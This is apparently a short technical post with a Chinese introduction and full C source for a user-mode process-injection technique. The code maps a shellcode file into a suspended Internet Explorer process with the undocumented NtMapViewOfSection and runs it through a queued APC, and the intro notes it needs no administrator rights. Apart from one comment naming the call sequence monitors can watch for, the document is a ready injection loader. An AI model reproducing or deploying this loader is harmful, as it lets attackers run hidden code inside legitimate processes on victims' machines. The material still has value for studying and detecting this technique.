0.ring3-NtMapViewOfSection注入
新的注入方式:利用一个未公开函数 NtMapViewOfSection 在远程进程地址空间写入代码,并用一种新的技术在远程进程中执行它。这种技术完全工作在用户模式下,不需要管理员权限之类的特殊条件。
/*
 * Demonstration of user-mode code injection via a shared section.
 *
 * Flow (all visible in WinMain below):
 *   1. Resolve ntdll!NtMapViewOfSection at runtime with GetProcAddress.
 *   2. Open a payload file and create a read-only file mapping of it.
 *   3. Create the target process with CREATE_SUSPENDED.
 *   4. Map the file mapping into the *target* process with
 *      NtMapViewOfSection (the Win32 MapViewOfFileEx only maps into the
 *      caller, which is why the native call is used).
 *   5. Queue a user-mode APC whose routine address is the mapped view and
 *      resume the primary thread, so the view is executed as the APC routine.
 *
 * From a monitoring standpoint the sequence "suspended process creation ->
 * cross-process section map -> QueueUserAPC -> ResumeThread" is the
 * observable pattern; every step here goes through documented or
 * well-known Win32/native calls, no kernel component is involved.
 *
 * NOTE(review): none of the return values in WinMain are checked
 * (LoadLibrary, GetProcAddress, CreateFile, CreateFileMapping,
 * CreateProcess, MyMapViewOfFileEx, QueueUserAPC); a failure at any step
 * silently carries invalid handles / a NULL pointer into the next call.
 */
#define _WIN32_WINNT 0x0400
#include <windows.h>

/* ntdll types that are not in the public SDK headers used here. */
typedef LONG NTSTATUS, *PNTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

typedef enum _SECTION_INHERIT {
    ViewShare = 1,
    ViewUnmap = 2
} SECTION_INHERIT;

/*
 * Prototype of ntdll!NtMapViewOfSection, in parameter order:
 * SectionHandle, ProcessHandle, BaseAddress (in/out), ZeroBits, CommitSize,
 * SectionOffset, ViewSize (in/out), InheritDisposition, AllocationType,
 * Win32Protect.
 */
typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*, SECTION_INHERIT, ULONG, ULONG );

/* Filled in by WinMain via GetProcAddress; NULL until then. */
func_NtMapViewOfSection NtMapViewOfSection = NULL;

/*
 * MapViewOfFileEx-style wrapper around NtMapViewOfSection that takes an
 * explicit target process handle.
 *
 * hProcess              process whose address space receives the view
 * hFileMappingObject    section (file mapping) handle to map
 * dwDesiredAccess       FILE_MAP_* flags; translated to a PAGE_* protection
 *                       below, checked in the order WRITE, READ, COPY
 * dwFileOffsetHigh/Low  64-bit offset into the section
 * dwNumberOfBytesToMap  requested view size (0 = whole section, as passed
 *                       through to the native call)
 * lpBaseAddress         preferred base address, or NULL
 *
 * Returns the base address of the view in hProcess, or NULL when the
 * native call does not return a success status.
 */
LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress ) {
    NTSTATUS Status;
    LARGE_INTEGER SectionOffset;
    ULONG ViewSize;
    ULONG Protect;
    LPVOID ViewBase;
    // Build the 64-bit section offset from the two DWORD halves.
    SectionOffset.LowPart = dwFileOffsetLow;
    SectionOffset.HighPart = dwFileOffsetHigh;
    // Both are in/out parameters of the native call; seed them with the request.
    ViewBase = lpBaseAddress;
    ViewSize = dwNumberOfBytesToMap;
    // Translate Win32 FILE_MAP_* access flags into an NT page protection.
    if (dwDesiredAccess & FILE_MAP_WRITE){Protect = PAGE_READWRITE;}
    else if (dwDesiredAccess & FILE_MAP_READ){Protect = PAGE_READONLY;}
    else if (dwDesiredAccess & FILE_MAP_COPY){Protect = PAGE_WRITECOPY;}
    else{Protect = PAGE_NOACCESS;}
    // Map the section into hProcess (ZeroBits = 0, CommitSize = 0,
    // ViewShare, AllocationType = 0).
    Status = NtMapViewOfSection(hFileMappingObject,hProcess,&ViewBase,0,0, &SectionOffset,&ViewSize, ViewShare, 0,Protect);
    if (!NT_SUCCESS(Status)){
        // Mapping failed; caller gets no address.
        return NULL;
    }
    // Base address of the view inside the target process.
    return ViewBase;
}

/*
 * Program entry point; see the file header for the overall sequence.
 * All four handles opened here are closed before returning, regardless of
 * whether the intermediate calls succeeded.
 */
int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int){
    // Resolve the undocumented export at runtime instead of linking ntdll.
    HMODULE hDll = LoadLibrary( "ntdll.dll" );
    NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");
    // Open the payload file and wrap it in a read-only file mapping.
    HANDLE hFile = CreateFile ("C:\\shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);
    // Start the target process suspended so the primary thread has not run yet.
    STARTUPINFO st; ZeroMemory (&st, sizeof(st));
    st.cb = sizeof (STARTUPINFO);
    PROCESS_INFORMATION pi;
    ZeroMemory (&pi, sizeof(pi));
    CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);
    // Map the payload section into the target's address space (read-only view,
    // whole section, no preferred base).
    LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);
    // Queue a user APC whose routine is the mapped view; it is delivered when
    // the suspended primary thread is resumed below.
    QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);
    ResumeThread (pi.hThread);
    // Release local handles; the view stays mapped in the target process.
    CloseHandle (hFile);
    CloseHandle (hMappedFile);
    CloseHandle (pi.hThread);
    CloseHandle (pi.hProcess);
    return 0;
}